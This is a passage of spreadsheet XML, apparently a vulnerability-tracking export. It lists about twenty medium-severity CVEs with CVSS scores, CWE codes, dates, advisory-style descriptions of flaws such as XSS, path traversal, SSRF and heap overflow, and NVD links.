        <v>6.1</v>
      </c>
      <c r="D4320" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4320" s="5" t="inlineStr"/>
      <c r="F4320" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4320" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4320" s="5" t="inlineStr"/>
      <c r="I4320" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J4320" s="5" t="inlineStr"/>
      <c r="K4320" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4320" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the Forum posting function of O2OA v10 allows attackers to execute arbitrary Javascript in the context of the victim's browser via a crafted URL.</t>
        </is>
      </c>
      <c r="M4320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52370</t>
        </is>
      </c>
    </row>
    <row r="4321">
      <c r="A4321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52773</t>
        </is>
      </c>
      <c r="C4321" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4321" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4321" s="5" t="inlineStr"/>
      <c r="F4321" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4321" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H4321" s="5" t="inlineStr"/>
      <c r="I4321" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4321" s="5" t="inlineStr"/>
      <c r="K4321" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="L4321" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.1.0 to before version 4.6.6, YesWiki's archived-revision view reflects the time GET parameter into a hidden HTML input in handlers/page/show.php without escaping. Because MySQL coerces malformed DATETIME strings, an attacker can append HTML or JavaScript to a valid archived revision timestamp, still load that archived revision, and execute arbitrary JavaScript in the victim's browser. The vulnerable form is only rendered when the victim can both read and edit the target page. In restricted deployments this requires a victim with read and write access to that page. On a default doryphore 4.6.5 install, public pages such as PagePrincipale were editable anonymously during validation, so the issue can also affect unauthenticated visitors in that configuration. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M4321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52773</t>
        </is>
      </c>
    </row>
    <row r="4322">
      <c r="A4322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52774</t>
        </is>
      </c>
      <c r="C4322" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4322" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4322" s="5" t="inlineStr"/>
      <c r="F4322" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4322" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4322" s="5" t="inlineStr"/>
      <c r="I4322" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4322" s="5" t="inlineStr"/>
      <c r="K4322" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="L4322" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki's Bazar widget handler reflects the id GET parameter into HTML attributes using strip_tags() only. Because strip_tags() does not escape double quotes, an attacker can break out of the attribute value, inject an event handler such as onmouseover, and execute arbitrary JavaScript in the victim's browser. This issue is reachable without authentication. During validation, the vulnerable widget route returned the injected HTML for both /HomePage/widget?id=... and /NoSuchPage/widget?id=..., which shows that no login, no page ownership, no edit rights, and not even a valid page tag were required. The only routing prerequisite observed was that the Bazar extension is enabled and the request includes an id parameter. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M4322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52774</t>
        </is>
      </c>
    </row>
    <row r="4323">
      <c r="A4323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54687</t>
        </is>
      </c>
      <c r="C4323" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4323" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4323" s="5" t="inlineStr"/>
      <c r="F4323" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4323" s="5" t="inlineStr"/>
      <c r="H4323" s="5" t="inlineStr"/>
      <c r="I4323" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J4323" s="5" t="inlineStr"/>
      <c r="K4323" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4323" s="5" t="inlineStr">
        <is>
          <t>n8n-nodes-sqlite3 is a node for operating a local SQLite database from n8n. Prior to 1.0.0, nodes/SqliteNode/v1/SqliteV1.node.ts exposes the db_path database file path as a node parameter that permits data expressions from upstream workflow input. A workflow author who maps untrusted input to db_path can allow a remote attacker to select which SQLite file the n8n process opens, enabling traversal outside the intended database location and potentially reading, creating, or overwriting files accessible to the process. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="M4323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54687</t>
        </is>
      </c>
    </row>
    <row r="4324">
      <c r="A4324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55059</t>
        </is>
      </c>
      <c r="C4324" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4324" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4324" s="5" t="inlineStr"/>
      <c r="F4324" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4324" s="5" t="inlineStr"/>
      <c r="H4324" s="5" t="inlineStr"/>
      <c r="I4324" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4324" s="5" t="inlineStr"/>
      <c r="K4324" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L4324" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions prior to 3.2.10, 3.3.12 and 3.4.13 contain a heap out-of-bounds write in Imf_4_0::SampleCountChannel::set(int r, unsigned int newNumSamples[]). The row-based sample-count setter computes the target Y coordinate with dataWindow.min.x instead of dataWindow.min.y. For a valid deep image data window where min.x != min.y, a valid row index can be translated into an invalid Y coordinate, causing writes before the allocated _numSamples buffer. The vulnerability is reachable through the public OpenEXRUtil DeepImage API and can lead to heap corruption and process crashes. This issue has been fixed in versions 3.2.10, 3.3.12 and 3.4.13.</t>
        </is>
      </c>
      <c r="M4324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55059</t>
        </is>
      </c>
    </row>
    <row r="4325">
      <c r="A4325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55087</t>
        </is>
      </c>
      <c r="C4325" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4325" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4325" s="5" t="inlineStr"/>
      <c r="F4325" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4325" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4325" s="5" t="inlineStr"/>
      <c r="I4325" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4325" s="5" t="inlineStr"/>
      <c r="K4325" s="5" t="inlineStr">
        <is>
          <t>CWE-444, CWE-601, CWE-79</t>
        </is>
      </c>
      <c r="L4325" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. From 2.1.0 until 3.1.0, Etherpad uses the attacker-controlled x-proxy-path request header in src/node/hooks/express/admin.ts when substituting paths into HTML, JavaScript, and CSS under /admin without sanitization, Vary: x-proxy-path, or Cache-Control: private, no-store. A shared proxy or CDN can cache the resulting response and serve attacker-injected script to an administrator. In src/node/hooks/express/specialpages.ts, version 3.0.0 also accepts a protocol-relative x-proxy-path value when constructing the /p/:pad/timeslider redirect, allowing redirection to an attacker-controlled host. The issues are exploitable when the deployment permits client-supplied x-proxy-path headers to reach Etherpad. This issue is fixed in version 3.1.0.</t>
        </is>
      </c>
      <c r="M4325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55087</t>
        </is>
      </c>
    </row>
    <row r="4326">
      <c r="A4326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55530</t>
        </is>
      </c>
      <c r="C4326" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4326" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4326" s="5" t="inlineStr"/>
      <c r="F4326" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4326" s="5" t="inlineStr"/>
      <c r="H4326" s="5" t="inlineStr"/>
      <c r="I4326" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4326" s="5" t="inlineStr"/>
      <c r="K4326" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4326" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, ast_grep_rewrite lacks the @require_approval decorator used by sibling mutation tools. With dry_run=False, an agent-controlled call can pass --update-all and a broad path to rewrite matching files without the expected authorization gate. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M4326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55530</t>
        </is>
      </c>
    </row>
    <row r="4327">
      <c r="A4327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55648</t>
        </is>
      </c>
      <c r="C4327" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4327" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4327" s="5" t="inlineStr"/>
      <c r="F4327" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4327" s="5" t="inlineStr"/>
      <c r="H4327" s="5" t="inlineStr"/>
      <c r="I4327" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4327" s="5" t="inlineStr"/>
      <c r="K4327" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L4327" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, freerdp_image_copy_from_icon_data in libfreerdp/codec/color.c calculates nWidth multiplied by nHeight multiplied by FreeRDPGetBytesPerPixel(format) in 32-bit arithmetic. A malicious RDP server can send a RAIL TS_ICON_INFO update with dimensions such as 32768 by 32768 and 32 bits per pixel so the required-size calculation wraps, bypassing the cbBitsColor source bounds check before freerdp_image_copy_no_overlap reads attacker-controlled icon data. This affects RemoteApp clients using the vulnerable library path, while xfreerdp has a caller-side mitigation. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M4327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55648</t>
        </is>
      </c>
    </row>
    <row r="4328">
      <c r="A4328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56706</t>
        </is>
      </c>
      <c r="C4328" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4328" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4328" s="5" t="inlineStr"/>
      <c r="F4328" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4328" s="5" t="inlineStr"/>
      <c r="H4328" s="5" t="inlineStr"/>
      <c r="I4328" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4328" s="5" t="inlineStr"/>
      <c r="K4328" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="L4328" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 uses a CSRF token scheme that transmits both the XOR mask and the masked value in every token (format (rand XOR secret):rand), allowing anyone who observes a single CSRF token (e.g., via network sniffing, log files, Referrer header, or XSS) to recover the session secret with a single XOR operation and forge unlimited valid tokens. The implementation is further weakened by a low-entropy session token (rand(1,1e6), ~20 bits) that permits blind brute-force, and by use of loose comparison (==) in token verification, enabling PHP type juggling. Exploitation enables cross-site request forgery against authenticated sessions, including execution of arbitrary SQL queries.</t>
        </is>
      </c>
      <c r="M4328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56706</t>
        </is>
      </c>
    </row>
    <row r="4329">
      <c r="A4329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61526</t>
        </is>
      </c>
      <c r="C4329" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4329" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4329" s="5" t="inlineStr"/>
      <c r="F4329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4329" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4329" s="5" t="inlineStr"/>
      <c r="I4329" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J4329" s="5" t="inlineStr"/>
      <c r="K4329" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4329" s="5" t="inlineStr">
        <is>
          <t>AdonisJS HTTP Server is a package for handling HTTP requests in the AdonisJS framework. In versions 8.0.0-next.0 through 8.2.0 and 9.0.0 through 9.0.2, the  error.message is interpolated into the default HTML exception response without escaping, allowing a crafted missing-route URL to execute attacker-controlled JavaScript when a victim opens it and no custom status page or JSON response handles the error. When debug mode is disabled and no custom status page handles the error, the default HTML renderer interpolates error.message directly into an HTML response. This issue is fixed in versions 8.2.1 and 9.1.0.</t>
        </is>
      </c>
      <c r="M4329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61526</t>
        </is>
      </c>
    </row>
    <row r="4330">
      <c r="A4330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63670</t>
        </is>
      </c>
      <c r="C4330" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4330" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4330" s="5" t="inlineStr"/>
      <c r="F4330" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4330" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4330" s="5" t="inlineStr"/>
      <c r="I4330" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4330" s="5" t="inlineStr"/>
      <c r="K4330" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4330" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. Prior to 2.17.6, sanitizeHtml() can pass disallowed executable markup through packages/sanitize-html/index.js when textarea or xmp is included in allowedTags because a literal solidus after the raw-text end-tag name is treated as text by htmlparser2 and the ontext handler emits that content without escaping, while a browser parses the following img onerror markup as active HTML. This issue is fixed in version 2.17.6.</t>
        </is>
      </c>
      <c r="M4330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63670</t>
        </is>
      </c>
    </row>
    <row r="4331">
      <c r="A4331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70620</t>
        </is>
      </c>
      <c r="C4331" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4331" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4331" s="5" t="inlineStr"/>
      <c r="F4331" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4331" s="5" t="inlineStr"/>
      <c r="H4331" s="5" t="inlineStr"/>
      <c r="I4331" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J4331" s="5" t="inlineStr"/>
      <c r="K4331" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4331" s="5" t="inlineStr">
        <is>
          <t>Odysseus before commit 87babb5 contains a server-side request forgery vulnerability that allows admin-privileged attackers to direct the server to probe internal network resources by supplying arbitrary URLs to the embedding endpoint configuration without scheme, host, IP range, or DNS rebind validation. Attackers can submit loopback addresses, RFC 1918 ranges, or link-local addresses through the embedding endpoint API to partially read responses from cloud instance metadata services, internal APIs, and other hosts reachable from the server.</t>
        </is>
      </c>
      <c r="M4331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70620</t>
        </is>
      </c>
    </row>
    <row r="4332">
      <c r="A4332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71403</t>
        </is>
      </c>
      <c r="C4332" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4332" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4332" s="5" t="inlineStr"/>
      <c r="F4332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4332" s="5" t="inlineStr"/>
      <c r="H4332" s="5" t="inlineStr"/>
      <c r="I4332" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4332" s="5" t="inlineStr"/>
      <c r="K4332" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4332" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Rancher Manager. The /v3/users update path did not enforce immutability of a User resource's `username` and `principalIds` fields. A user holding the `update` verb on `users.management.cattle.io` could inject a foreign identity provider principal into any account, so that the next login by the owner of that principal was bound to the victim's account and inherited its role bindings.
This issue affects Rancher: before 2.15.1.</t>
        </is>
      </c>
      <c r="M4332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71403</t>
        </is>
      </c>
    </row>
    <row r="4333">
      <c r="A4333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71435</t>
        </is>
      </c>
      <c r="C4333" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4333" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4333" s="5" t="inlineStr"/>
      <c r="F4333" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4333" s="5" t="inlineStr"/>
      <c r="H4333" s="5" t="inlineStr"/>
      <c r="I4333" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J4333" s="5" t="inlineStr"/>
      <c r="K4333" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4333" s="5" t="inlineStr">
        <is>
          <t>Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.74.3 and 6.24.2, the default ("automagic") form notification email rendered user-submitted values without escaping, allowing an unauthenticated form submitter to inject HTML into the notification emails sent to the configured recipients. This issue is fixed in versions 5.74.3 and 6.24.2.</t>
        </is>
      </c>
      <c r="M4333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71435</t>
        </is>
      </c>
    </row>
    <row r="4334">
      <c r="A4334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71478</t>
        </is>
      </c>
      <c r="C4334" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4334" s="5" t="inlineStr"/>
      <c r="F4334" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4334" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4334" s="5" t="inlineStr"/>
      <c r="I4334" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J4334" s="5" t="inlineStr"/>
      <c r="K4334" s="5" t="inlineStr">
        <is>
          <t>CWE-692, CWE-79, CWE-86</t>
        </is>
      </c>
      <c r="L4334" s="5" t="inlineStr">
        <is>
          <t>league/commonmark is a PHP library for parsing and rendering CommonMark Markdown. From 1.5.0 until 2.9.0, the AttributesExtension's href and src unsafe-link filter can be bypassed by embedding control bytes, such as a tab, carriage return, line feed, or leading C0 control character, in a javascript: URL that browsers discard before parsing the scheme, causing the browser to still execute the script even when the unsafe-link filter is enabled. This issue is fixed in 2.9.0.</t>
        </is>
      </c>
      <c r="M4334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71478</t>
        </is>
      </c>
    </row>
    <row r="4335">
      <c r="A4335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72769</t>
        </is>
      </c>
      <c r="C4335" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4335" s="5" t="inlineStr"/>
      <c r="F4335" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4335" s="5" t="inlineStr"/>
      <c r="H4335" s="5" t="inlineStr"/>
      <c r="I4335" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4335" s="5" t="inlineStr"/>
      <c r="K4335" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L4335" s="5" t="inlineStr">
        <is>
          <t>n8n before 1.123.67, 2.31.5, and 2.32.1 contains a prototype pollution vulnerability in the VM expression engine. An authenticated user able to create or edit a workflow expression can abuse the engine's array-element access to obtain a reference to a host built-in and pollute its prototype in the main n8n process (a sandbox escape), leading to a denial of service. Both self-hosted and cloud instances running the VM expression engine are affected.</t>
        </is>
      </c>
      <c r="M4335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72769</t>
        </is>
      </c>
    </row>
    <row r="4336">
      <c r="A4336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73084</t>
        </is>
      </c>
      <c r="C4336" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4336" s="5" t="inlineStr"/>
      <c r="F4336" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4336" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4336" s="5" t="inlineStr"/>
      <c r="I4336" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4336" s="5" t="inlineStr"/>
      <c r="K4336" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L4336" s="5" t="inlineStr">
        <is>
          <t>Activepieces is an open source AI workflow automation platform. Prior to 0.83.0, the /api/redirect OAuth callback endpoint embeds the user-supplied code query parameter directly into an inline script block without proper escaping. A crafted request to /api/redirect with a malicious code value can break out of the script context and execute arbitrary JavaScript in the Activepieces origin when a logged-in user opens it. An unauthenticated attacker can access the victim's session tokens or make authenticated API calls on the victim's behalf. This issue is fixed in version 0.83.0.</t>
        </is>
      </c>
      <c r="M4336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73084</t>
        </is>
      </c>
    </row>
    <row r="4337">
      <c r="A4337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73235</t>
        </is>
      </c>
      <c r="C4337" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4337" s="5" t="inlineStr"/>
      <c r="F4337" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4337" s="5" t="inlineStr"/>
      <c r="H4337" s="5" t="inlineStr"/>
      <c r="I4337" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4337" s="5" t="inlineStr"/>
      <c r="K4337" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L4337" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, the Xerces SAX2 XMLReader constructed in src/Base/Reader.cpp by Base::XMLReader::XMLReader() parses attacker-controlled Document.xml from a crafted .FCStd archive without disabling default external entity resolution or external DTD loading. When Document::restore() opens the document, external entities can read local files through the file URI scheme or initiate server-side requests through the http URI scheme, and resolved content can flow through the characters() callback. This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M4337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73235</t>
        </is>
      </c>
    </row>
    <row r="4338">
      <c r="A4338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73288</t>
        </is>
      </c>
      <c r="C4338" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4338" s="5" t="inlineStr"/>
      <c r="F4338" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4338" s="5" t="inlineStr"/>
      <c r="H4338" s="5" t="inlineStr"/>
      <c r="I4338" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4338" s="5" t="inlineStr"/>
      <c r="K4338" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-754</t>
        </is>
      </c>
      <c r="L4338" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-rc.1, RustFS Object Lock enforcement in crates/ecstore/src/bucket/object_lock/objectlock_sys.rs lets check_object_lock_for_deletion, delete_prefix, and lifecycle and scanner sweeps treat ConfigNotFound, unreadable .metadata.bin data, or unparseable metadata as no lock configuration, allowing objects under COMPLIANCE retention to be deleted or expired. This issue is fixed in version 1.0.0-rc.1.</t>
        </is>
      </c>
      <c r="M4338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73288</t>
        </is>
      </c>
    </row>
    <row r="4339">
      <c r="A4339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73434</t>
        </is>
      </c>
      <c r="C4339" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4339" s="5" t="inlineStr"/>
      <c r="F4339" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4339" s="5" t="inlineStr"/>
      <c r="H4339" s="5" t="inlineStr">
        <is>
          <t>gstreamer:gstreamer, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I4339" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4339" s="5" t="inlineStr"/>
      <c r="K4339" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
